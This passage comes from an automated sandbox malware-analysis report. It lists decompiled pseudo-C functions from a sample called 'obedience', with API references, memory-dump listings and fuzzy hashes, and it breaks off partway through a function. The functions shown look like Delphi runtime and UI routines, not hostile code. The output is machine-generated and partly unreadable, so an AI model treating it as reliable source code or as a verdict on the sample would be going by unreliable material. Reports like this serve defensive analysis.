      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Timer$KillLoadString
      • String ID: 8;B$TsA
      • API String ID: 1423459280-188886330
      • Opcode ID: 653e3072adaa866e9a41243bb1f2036cab4c303aa52ad2bf65e08713aa31443a
      • Instruction ID: fc89184edf4f2d8c5e1b779533e12bfff54074cc48cea77d7f6933711752c84d
      • Opcode Fuzzy Hash: 653e3072adaa866e9a41243bb1f2036cab4c303aa52ad2bf65e08713aa31443a
      • Instruction Fuzzy Hash: 5A01B531604300ABD715EF65CC82B5A37BCDB49708F402466FE00AB2C2D3B9AD40C698
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E0040E31C() {
      				_Unknown_base(*)()* _t1;
      				struct HINSTANCE__* _t3;
      
      				_t1 = GetModuleHandleA("kernel32.dll");
      				_t3 = _t1;
      				if(_t3 != 0) {
      					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
      					 *0x48e134 = _t1;
      				}
      				if( *0x48e134 == 0) {
      					 *0x48e134 = E004099C4;
      					return E004099C4;
      				}
      				return _t1;
      			}

      APIs
      • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040EDE5,00000000,0040EDF8), ref: 0040E322
      • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040E333
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: GetDiskFreeSpaceExA$kernel32.dll
      • API String ID: 1646373207-3712701948
      • Opcode ID: 820f91be3b8516ba66e9ed471ca0a46da153e516522f4369c6fd71ba51a6564c
      • Instruction ID: 98c30d4ba901a7e1080fdc39561c8d2cb040fb54f4d3c54242f05c2c160db7a7
      • Opcode Fuzzy Hash: 820f91be3b8516ba66e9ed471ca0a46da153e516522f4369c6fd71ba51a6564c
      • Instruction Fuzzy Hash: 64D09EB1A063059AD700ABB79DD5B1A29549710304F145C3FE451773D1D6BD5864871E
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E0042CF40() {
      				struct HINSTANCE__* _t1;
      				struct HINSTANCE__* _t2;
      				_Unknown_base(*)()* _t3;
      
      				if( *0x4908fc == 0) {
      					_t1 = GetModuleHandleA("comctl32.dll");
      					 *0x4908fc = _t1;
      					if( *0x4908fc != 0) {
      						_t2 =  *0x4908fc; // 0x0
      						_t3 = GetProcAddress(_t2, "InitCommonControlsEx");
      						 *0x490900 = _t3;
      						return _t3;
      					}
      				}
      				return _t1;
      			}

      APIs
      • GetModuleHandleA.KERNEL32(comctl32.dll,0042CFB1,00000200,0046ECBE), ref: 0042CF4E
      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0042CF6C
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: InitCommonControlsEx$comctl32.dll
      • API String ID: 1646373207-802336580
      • Opcode ID: 69c23fe39cfbf1b6f93598a79715fcf1f3c75653fdb2a587359c7aa0f653e107
      • Instruction ID: 1c0b5fde6f092bdb74da236ea341a7adebd99d50b4511986d6cc84d4ca1c0675
      • Opcode Fuzzy Hash: 69c23fe39cfbf1b6f93598a79715fcf1f3c75653fdb2a587359c7aa0f653e107
      • Instruction Fuzzy Hash: 9CD01770BC43118EC210EB31BA49B0932A1A721304F8181BBA100621E0C37825088FCC
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 92%
      			E00442838(intOrPtr* __eax, signed int __edx) {
      				intOrPtr _v16;
      				char _v20;
      				char _v24;
      				char _v28;
      				intOrPtr _t49;
      				intOrPtr _t53;
      				intOrPtr _t54;
      				intOrPtr _t55;
      				intOrPtr _t56;
      				intOrPtr* _t60;
      				intOrPtr* _t62;
      				struct HICON__* _t65;
      				intOrPtr _t67;
      				intOrPtr* _t72;
      				intOrPtr _t74;
      				intOrPtr* _t75;
      				intOrPtr _t78;
      				intOrPtr _t80;
      				intOrPtr _t82;
      				intOrPtr _t84;
      				intOrPtr _t85;
      				struct HWND__* _t88;
      				intOrPtr _t89;
      				intOrPtr _t91;
      				intOrPtr* _t93;
      				intOrPtr _t97;
      				intOrPtr _t100;
      				intOrPtr _t102;
      				intOrPtr _t103;
      				intOrPtr _t104;
      				intOrPtr _t106;
      				struct HWND__* _t107;
      				intOrPtr _t108;
      				intOrPtr _t110;
      				intOrPtr _t114;
      				intOrPtr _t117;
      				char _t118;
      				intOrPtr _t119;
      				void* _t131;
      				intOrPtr _t135;
      				intOrPtr _t140;
      				intOrPtr* _t155;
      				void* _t158;
      				void* _t165;
      				void* _t166;
      
      				_t155 = __eax;
      				if( *0x490b18 != 0) {
      					L3:
      					_t49 =  *0x490af8; // 0x0
      					_t117 = E00442704(_t155,  &_v28, _t49);
      					if( *0x490b18 == 0) {
      						_t168 =  *0x490b1c;
      						if( *0x490b1c != 0) {
      							_t106 =  *0x490b0c; // 0x0
      							_t107 = GetDesktopWindow();
      							_t108 =  *0x490b1c; // 0x0
      							E0044CC7C(_t108, _t107, _t168, _t106);
      						}
      					}
      					_t53 =  *0x490af8; // 0x0
      					if( *((char*)(_t53 + 0x9b)) != 0) {
      						__eflags =  *0x490b18;
      						_t6 =  &_v24;
      						 *_t6 =  *0x490b18 != 0;
      						__eflags =  *_t6;
      						 *0x490b18 = 2;
      					} else {
      						 *0x490b18 = 1;
      						_v24 = 0;
      					}
      					_t54 =  *0x490afc; // 0x0
      					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
      						L12:
      						_t55 =  *0x490afc; // 0x0
      						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
      						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
      						_t56 =  *0x490afc; // 0x0
      						if( *((intOrPtr*)(_t56 + 4)) != 0) {
      							_t97 =  *0x490afc; // 0x0
      							E0044446C( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
      							_t100 =  *0x490afc; // 0x0
      							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
      							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
      						}
      						_t131 = E0044275C(2);
      						_t121 =  *_t155;
      						_t60 =  *0x490afc; // 0x0
      						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
      						if( *0x490b1c != 0) {
      							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
      								_t82 =  *0x490b1c; // 0x0
      								E0044CC38(_t82, _t158);
      								_t84 =  *0x490b1c; // 0x0
      								_t177 =  *((char*)(_t84 + 0x6a));
      								if( *((char*)(_t84 + 0x6a)) != 0) {
      									_t121 =  *((intOrPtr*)(_t155 + 4));
      									_t85 =  *0x490b1c; // 0x0
      									E0044CD64(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
      								} else {
      									_t88 = GetDesktopWindow();
      									_t121 =  *_t155;
      									_t89 =  *0x490b1c; // 0x0
      									E0044CC7C(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
      								}
      							} else {
      								_t91 =  *0x490b1c; // 0x0
      								E0044CDD8(_t91, _t131, __eflags);
      								_t93 =  *0x48f9b8; // 0x490b80
      								SetCursor(E00462578( *_t93, _t121, _t158));
      							}
      						}
      						_t62 =  *0x48f9b8; // 0x490b80
      						_t65 = SetCursor(E00462578( *_t62, _t121, _t158));
      						if( *0x490b18 != 2) {
      							L32:
      							return _t65;
      						} else {
      							_t179 = _t117;
      							if(_t117 != 0) {
      								_t118 = E00442798();
      								_t67 =  *0x490afc; // 0x0
      								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
      								__eflags = _t118;
      								if(__eflags != 0) {
      									E0044446C(_t118,  &_v24, _t155);
      									_t65 = E00403DF8(_t118, __eflags);
      									_t135 =  *0x490afc; // 0x0
      									 *(_t135 + 0x54) = _t65;
      								} else {
      									_t78 =  *0x490afc; // 0x0
      									_t65 = E00403DF8( *((intOrPtr*)(_t78 + 4)), __eflags);
      									_t140 =  *0x490afc; // 0x0
      									 *(_t140 + 0x54) = _t65;
      								}
      							} else {
      								_push( *((intOrPtr*)(_t155 + 4)));
      								_t80 =  *0x490afc; // 0x0
      								_t65 = E00403DF8( *((intOrPtr*)(_t80 + 0x38)), _t179);
      							}
      							if( *0x490afc == 0) {
      								goto L32;
      							} else {
      								_t119 =  *0x490afc; // 0x0
      								_t41 = _t119 + 0x5c; // 0x5c
      								_t42 = _t119 + 0x44; // 0x44
      								_t65 = E00408D74(_t42, 0x10, _t41);
      								if(_t65 != 0) {
      									goto L32;
      								}
      								if(_v28 != 0) {
      									_t75 =  *0x490afc; // 0x0
      									 *((intOrPtr*)( *_t75 + 0x34))();
      								}
      								_t72 =  *0x490afc; // 0x0
      								 *((intOrPtr*)( *_t72 + 0x30))();
      								_t74 =  *0x490afc; // 0x0
      								asm("movsd");
      								asm("movsd");
      								asm("movsd");
      								asm("movsd");
      								return _t74;
      							}
      						}
      					}
      					_t65 = E0044275C(1);
      					if( *0x490afc == 0) {
      						goto L32;
      					}
      					_t102 =  *0x490afc; // 0x0
      					 *((intOrPtr*)(_t102 + 4)) = _t117;
      					_t103 =  *0x490afc; // 0x0
      					 *((intOrPtr*)(_t103 + 8)) = _v28;
      					_t104 =  *0x490afc; // 0x0
      					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
      					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
      					_t65 = E0044275C(0);
      					if( *0x490afc == 0) {
      						goto L32;
      					}
      					goto L12;
      				}
      				_t110 =  *0x490b08; // 0x0
      				asm("cdq");
      				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x490b14; // 0x0
      				if(_t165 >= 0) {
      					goto L3;
      				}
      				_t114 =  *0x490b0c; // 0x0
      				asm("cdq");
      				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
      				_t166 = _t65 -  *0x490b14; // 0x0
      				if(_t166 < 0) {
      					goto L32;
      				}
      				goto L3;
      			}

      APIs
      • GetDesktopWindow.USER32 ref: 004428AC
      • GetDesktopWindow.USER32 ref: 004429D1
      • SetCursor.USER32(00000000), ref: 00442A26
        • Part of subcall function 0044CDD8: 6F92B5E0.COMCTL32(00000000,?,00442A01), ref: 0044CDF4
        • Part of subcall function 0044CDD8: ShowCursor.USER32(000000FF,00000000,?,00442A01), ref: 0044CE0F
      • SetCursor.USER32(00000000), ref: 00442A11
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Cursor$DesktopWindow$Show
      • String ID:
      • API String ID: 110329033-0
      • Opcode ID: 3daca00d52fd1c33167f487ef72eddb1537db0d0b50adb96641fc27296665b89
      • Instruction ID: 5e718cac9c8d13d13458fbd3ddd84bedf38a8beaf1cce254d608406e1ba6b687
      • Opcode Fuzzy Hash: 3daca00d52fd1c33167f487ef72eddb1537db0d0b50adb96641fc27296665b89
      • Instruction Fuzzy Hash: 6491AF756402028FD350DF6ADAC4E06BBE1BB68308F54847BF904977A6C7B8EC45CB89
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 66%
      			E00437E98(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
      				char _v5;
      				long _v12;
      				char _v13;
      				char _v20;
      				char _v24;
      				char _v28;
      				char _v32;
      				void* _t35;
      				long _t37;
      				void* _t47;
      				void* _t67;
      				void* _t68;
      				long _t80;
      				void* _t85;
      				intOrPtr* _t95;
      				intOrPtr _t106;
      				void* _t123;
      				intOrPtr _t129;
      
      				_push(0);
      				_push(0);
      				_push(0);
      				_push(0);
      				_push(0);
      				_push(0);
      				_push(0);
      				_t123 = __edx;
      				_t95 = __eax;
      				_push(_t129);
      				_push(0x43804d);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t129;
      				_t35 = E00404D00(__edx);
      				_t130 = _t35;
      				if(_t35 != 0) {
      					_t37 = E00404F00(__edx);
      					_v12 = SendMessageA(E0044B158(_t95), 0x14c, 0xffffffff, _t37);
      					__eflags = _v12 - 0xffffffff;
      					_v5 = _v12 != 0xffffffff;
      					__eflags = _v5;
      					if(_v5 != 0) {
      						_t47 =  *((intOrPtr*)( *_t95 + 0xcc))();
      						__eflags = _t47 - _v12;
      						_v13 = _t47 != _v12;
      						__eflags =  *((char*)(_t95 + 0x290));
      						if( *((char*)(_t95 + 0x290)) != 0) {
      							_t85 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t95 + 0x23c)))) + 0x54))();
      							__eflags = _t85 + 1;
      							if(_t85 + 1 != 0) {
      								SendMessageA(E0044B158(_t95), 0x14f, 0, 0);
      							}
      						}
      						SendMessageA(E0044B158(_t95), 0x14e, _v12, 0);
      						__eflags =  *((intOrPtr*)(_t95 + 0x276)) - 2;
      						if( *((intOrPtr*)(_t95 + 0x276)) - 2 >= 0) {
      							 *((intOrPtr*)( *_t95 + 0xd0))();
      							E00404A94(_t95 + 0x270, _t123);
      						} else {
      							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t95 + 0x23c)))) + 0xc))( &_v24);
      							_push(_v28);
      							_t67 = E00404D00(_t123);
      							_pop(_t68);
      							E00404F60(_t68, 0x7fffffff, _t67 + 1);
      							E00404D4C( &_v20, _v24, _t123);
      							E00444958(_t95, _t95, _v20, _t123);
      							E00444928(_t95,  &_v32);
      							_push(E00404D00(_v32));
      							E00404D00(_t123);
      							_t80 = E00407ABC();
      							SendMessageA(E0044B158(_t95), 0x142, 0, _t80);
      						}
      						__eflags = _v13;
      						if(__eflags != 0) {
      							E00403DF8(_t95, __eflags);
      							E00403DF8(_t95, __eflags);
      						}
      					}
      				} else {
      					_v5 = 0;
      					 *((intOrPtr*)( *_t95 + 0xd0))();
      					E00403DF8(_t95, _t130);
      				}
      				_pop(_t106);
      				 *[fs:eax] = _t106;
      				_push(0x438054);
      				E00404A40( &_v32);
      				return E00404A64( &_v28, 3);
      			}

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: MessageSend
      • String ID:
      • API String ID: 3850602802-0
      • Opcode ID: 7b6b19c2b2a154fc7cf38e5b070cb3e144afaff7544f79edd936067099f76a9a
      • Instruction ID: 80eedd5dbe5e322c0a2c1ade7a71e845cd43a75777dc8fee7a3395d8c04566c8
      • Opcode Fuzzy Hash: 7b6b19c2b2a154fc7cf38e5b070cb3e144afaff7544f79edd936067099f76a9a
      • Instruction Fuzzy Hash: 7141A170B042056BD700EB79DC86B9EB769AF89714F20457AF514BB3C2CA389D0AC769
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 82%
      			E004102EC(intOrPtr* __eax) {
      				char _v260;
      				char _v768;
      				char _v772;
      				intOrPtr* _v776;
      				signed short* _v780;
      				char _v784;
      				signed int _v788;
      				char _v792;
      				intOrPtr* _v796;
      				signed char _t43;
      				intOrPtr* _t60;
      				void* _t79;
      				void* _t81;
      				void* _t84;
      				void* _t85;
      				intOrPtr* _t92;
      				void* _t96;
      				char* _t97;
      				void* _t98;
      
      				_v776 = __eax;
      				if(( *(_v776 + 1) & 0x00000020) == 0) {
      					E00410134(0x80070057);
      				}
      				_t43 =  *_v776;
      				if((_t43 & 0x00000fff) == 0xc) {
      					if((_t43 & 0x00000040) == 0) {
      						_v780 =  *((intOrPtr*)(_v776 + 8));
      					} else {
      						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
      					}
      					_v788 =  *_v780 & 0x0000ffff;
      					_t79 = _v788 - 1;
      					if(_t79 >= 0) {
      						_t85 = _t79 + 1;
      						_t96 = 0;
      						_t97 =  &_v772;
      						do {
      							_v796 = _t97;
      							_push(_v796 + 4);
      							_t22 = _t96 + 1; // 0x1
      							_push(_v780);
      							L0040F27C();
      							E00410134(_v780);
      							_push( &_v784);
      							_t25 = _t96 + 1; // 0x1
      							_push(_v780);
      							L0040F284();
      							E00410134(_v780);
      							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
      							_t96 = _t96 + 1;
      							_t97 = _t97 + 8;
      							_t85 = _t85 - 1;
      						} while (_t85 != 0);
      					}
      					_t81 = _v788 - 1;
      					if(_t81 >= 0) {
      						_t84 = _t81 + 1;
      						_t60 =  &_v768;
      						_t92 =  &_v260;
      						do {
      							 *_t92 =  *_t60;
      							_t92 = _t92 + 4;
      							_t60 = _t60 + 8;
      							_t84 = _t84 - 1;
      						} while (_t84 != 0);
      						do {
      							goto L12;
      						} while (E00410290(_t83, _t98) != 0);
      						goto L15;
      					}
      					L12:
      					_t83 = _v788 - 1;
      					if(E00410260(_v788 - 1, _t98) != 0) {
      						_push( &_v792);
      						_push( &_v260);
      						_push(_v780);
      						L0040F28C();
      						E00410134(_v780);
      						E004104E4(_v792);
      					}
      				}
      				L15:
      				_push(_v776);
      				L0040EE18();
      				return E00410134(_v776);
      			}

      APIs
      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0041039B
      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004103B7
      • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0041042E
      • VariantClear.OLEAUT32(?), ref: 00410457
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: ArraySafe$Bound$ClearIndexVariant
      • String ID:
      • API String ID: 920484758-0
      • Opcode ID: e85ecf4578ac51372620a61d19918b7dc21c3ea5ddb8186808ad17ebf1b1af52
      • Instruction ID: 7928089db94cb584507fdb068a9a76f506fac287d53e554137c0142889eb6df4
      • Opcode Fuzzy Hash: e85ecf4578ac51372620a61d19918b7dc21c3ea5ddb8186808ad17ebf1b1af52
      • Instruction Fuzzy Hash: AD411075A0121D9FCB61DB59CC90AC9B3BCAF49314F0041EAE549E7312DA78AFC58F58
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E0040C98C(intOrPtr* __eax, void* __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				intOrPtr _v16;
      				char _v277;
      				char _v538;
      				char _v794;
      				struct _MEMORY_BASIC_INFORMATION _v824;
      				char _v828;
      				intOrPtr _v832;
      				char _v836;
      				intOrPtr _v840;
      				char _v844;
      				intOrPtr _v848;
      				char _v852;
      				char* _v856;
      				char _v860;
      				char _v864;
      				char _v1120;
      				void* __edi;
      				struct HINSTANCE__* _t45;
      				intOrPtr _t58;
      				struct HINSTANCE__* _t60;
      				void* _t78;
      				intOrPtr* _t83;
      				void* _t94;
      				void* _t95;
      				void* _t102;
      
      				_t102 = __fp0;
      				_t84 = __ecx;
      				_t94 = __ecx;
      				_t95 = __edx;
      				_t83 = __eax;
      				VirtualQuery(__edx,  &_v824, 0x1c);
      				if(_v824.State != 0x1000 || GetModuleFileNameA(_v824.AllocationBase,  &_v538, 0x105) == 0) {
      					_t45 =  *0x490664; // 0x400000
      					GetModuleFileNameA(_t45,  &_v538, 0x105);
      					_v16 = E0040C980(_t95);
      				} else {
      					_v16 = _t95 - _v824.AllocationBase;
      				}
      				E00409AA8( &_v277, 0x104, E0040DA70( &_v538, _t84, 0x5c) + 1);
      				_v8 = 0x40cb1c;
      				_v12 = 0x40cb1c;
      				_t91 =  *0x40801c; // 0x408068
      				if(E00403D88(_t83, _t91) != 0) {
      					_v8 = E00404F00( *((intOrPtr*)(_t83 + 4)));
      					_t78 = E00409A44(_v8, _t94);
      					if(_t78 != 0) {
      						_t91 = _v8;
      						if( *((char*)(_v8 + _t78 - 1)) != 0x2e) {
      							_v12 = 0x40cb20;
      						}
      					}
      				}
      				_t58 =  *0x48f9a8; // 0x407db4
      				_t21 = _t58 + 4; // 0xffea
      				_t60 =  *0x490664; // 0x400000
      				LoadStringA(E00405EC0(_t60, 0x104, _t91),  *_t21,  &_v794, 0x100);
      				E00403B40( *_t83,  &_v1120);
      				_v864 =  &_v1120;
      				_v860 = 4;
      				_v856 =  &_v277;
      				_v852 = 6;
      				_v848 = _v16;
      				_v844 = 5;
      				_v840 = _v8;
      				_v836 = 6;
      				_v832 = _v12;
      				_v828 = 6;
      				E0040A118(_t94, _a4, _t102, 4,  &_v864);
      				return E00409A44(_t94, _t94);
      			}

      APIs
      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040C9A8
      • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040C9CC
      • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040C9E7
      • LoadStringA.USER32 ref: 0040CA8B
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: FileModuleName$LoadQueryStringVirtual
      • String ID:
      • API String ID: 3990497365-0
      • Opcode ID: 69d37889808d8cf8d7bfa5b109ecc6159cf0b95448ca72fc4a857b0d2cf15968
      • Instruction ID: 01abf79933815d5844c322c3f75df39bcb1699d5901c2f7fe45156ecf4dfb8e4
      • Opcode Fuzzy Hash: 69d37889808d8cf8d7bfa5b109ecc6159cf0b95448ca72fc4a857b0d2cf15968
      • Instruction Fuzzy Hash: 1F41F9B1A002589FDB11DB69DC85B9EB7B8AB48304F0441FAA508F7291D778AF848F59
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E0040C98A(intOrPtr* __eax, void* __ecx, void* __edx, intOrPtr _a4) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				intOrPtr _v16;
      				char _v277;
      				char _v538;
      				char _v794;
      				struct _MEMORY_BASIC_INFORMATION _v824;
      				char _v828;
      				intOrPtr _v832;
      				char _v836;
      				intOrPtr _v840;
      				char _v844;
      				intOrPtr _v848;
      				char _v852;
      				char* _v856;
      				char _v860;
      				char _v864;
      				char _v1120;
      				void* __edi;
      				struct HINSTANCE__* _t45;
      				intOrPtr _t58;
      				struct HINSTANCE__* _t60;
      				void* _t78;
      				intOrPtr* _t84;
      				void* _t97;
      				void* _t100;
      				void* _t114;
      
      				_t86 = __ecx;
      				_t97 = __ecx;
      				_t100 = __edx;
      				_t84 = __eax;
      				VirtualQuery(__edx,  &_v824, 0x1c);
      				if(_v824.State != 0x1000 || GetModuleFileNameA(_v824.AllocationBase,  &_v538, 0x105) == 0) {
      					_t45 =  *0x490664; // 0x400000
      					GetModuleFileNameA(_t45,  &_v538, 0x105);
      					_v16 = E0040C980(_t100);
      				} else {
      					_v16 = _t100 - _v824.AllocationBase;
      				}
      				E00409AA8( &_v277, 0x104, E0040DA70( &_v538, _t86, 0x5c) + 1);
      				_v8 = 0x40cb1c;
      				_v12 = 0x40cb1c;
      				_t93 =  *0x40801c; // 0x408068
      				if(E00403D88(_t84, _t93) != 0) {
